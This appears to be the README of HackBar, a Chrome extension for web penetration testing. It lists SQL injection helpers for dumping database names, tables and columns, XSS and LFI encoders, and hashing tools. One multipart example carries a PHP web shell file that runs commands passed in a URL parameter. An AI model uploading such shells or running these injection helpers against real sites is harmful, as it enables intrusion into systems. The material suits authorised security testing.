HackBar for Chrome.
Available on Chrome Web Store.
- tabs
- webRequest
- webRequestBlocking
-
Supported methods
- GET
- POST
- application/x-www-form-urlencoded
- multipart/form-data
- application/json
-
SQLi
- Dump all database names (MySQL, PostgreSQL)
- Dump tables from database (MySQL, PostgreSQL)
- Dump columns from database (MySQL, PostgreSQL)
- Union select statement (MySQL, PostgreSQL)
- Error-based injection statement (MySQL, PostgreSQL)
- Space to Inline comment
-
XSS
- Html encode/decode
- String.fromCharCode encode/decode
-
LFI
- PHP wrapper - Base64
-
Encoding
- URL encode/decode
- Base64 encode/decode
- Hexadecimal encode/decode
- Unicode encode/decode
-
Hashing
- MD5
- SHA1
- SHA256
- SHA512
- Open Developer tools (Press
F12orCtrl + Shift + I) - Switch to HackBar tab
- Enjoy it
| Description | Default | Mac |
|---|---|---|
| Load URL | Alt + A | Control + A |
| Split URL | Alt + S | Control + S |
| Execute URL | Alt + X | Control + X |
After changing enctype field to multipart/form-data, you can put your payload into Body field such as the following:
------WebKitFormBoundarydbJBATDXCC6CL0lZ Content-Disposition: form-data; name="user" user ------WebKitFormBoundarydbJBATDXCC6CL0lZ Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/x-httpd-php <?php passthru($_GET['c']); ?> ------WebKitFormBoundarydbJBATDXCC6CL0lZ-- We will consider the first line as boundary, and reconstruct a form element to send your request.
Therefore, sent boundary will not be the same as your typed.
After changing enctype field to application/json, you can put your payload into Body field such as the following:
{ "username": "admin", "password": "admin" } In order to post JSON data, we will insert a dummy field or object to your JSON such as the following:
{"username":"admin","password":"admin","4dxnzjzd5mi":"="} For more details, please visit "Posting JSON with an HTML Form".
- Vue.js
- Vuetify.js
- crypto-js